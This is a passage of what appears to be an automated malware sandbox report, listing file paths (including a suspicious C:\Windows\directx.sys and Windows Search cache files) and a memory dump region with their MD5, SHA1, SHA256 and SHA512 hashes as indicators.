| SHA1 | fccd65736532a5423c49f7f8276832d851c83fda |
| SHA256 | 46c94b651026e313c18927f70f691c06c4130c287c68edaac9f394248d3b8fee |
| SHA512 | 18eddb66c45edb518f13345d93b9519db5351192114e3e1a9a60d171e619bcb38184e1d5cbc474f9a9f0eb9dc127098cd06170c596c0892e2d03345b5f78398d |
C:\Windows\directx.sys
| MD5 | df4b726420e2808bebb193d0551748be |
| SHA1 | 766deac044b3bd6744c9b11692f07bacdfc8bde1 |
| SHA256 | 6ba53e0783606f058440787b2d3e65f2f6ba8f9b881029da2cee1ca954899a16 |
| SHA512 | e59b0263f761ebdf0a3774ec0fa3552c92d2a8078feb25ed10f91f0ff2773725e925f09398a51bc340961ed45b6f65c9918a47d21a2048ccfb0580d930b1366d |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133655090403029466.txt
| MD5 | 34d41df917cd5e9f298161755db8f781 |
| SHA1 | 1b02dc05a7d5edbe4d0928869b4844e28bad39d6 |
| SHA256 | 13f00b0be5c428f37e096ea88e80e7ef2694f348f2765a93301023f880c6c44d |
| SHA512 | 55d34f180b0572b5e8f66f594dca6e141508416242d54b1f8cca6c5ca4c7d9cd61d8aebf8744feb35968aa7bf23e5956d962d9481b82f9bc44830e3a9b14b30a |
memory/4980-10310-0x000000001DE70000-0x000000001DE7A000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\P9Y213ES\microsoft.windows[1].xml
| MD5 | d00b5818a22962c590cc6ee051a07d47 |
| SHA1 | bcfb9dbd77e02927397dc89699767ee027aa4170 |
| SHA256 | 117d711d34245abdb606930bdef6cf32d042ecaa937e2b02803bd11c6294e106 |
| SHA512 | 1fbef9dbf6f4205fed319815534a6f1b039b9d7502d9c95fbe4ee57340b9ce4ee8948cc11212c89f8512dc9416e94c21405a21ae5ec8e57fb7fb20f2ea60b561 |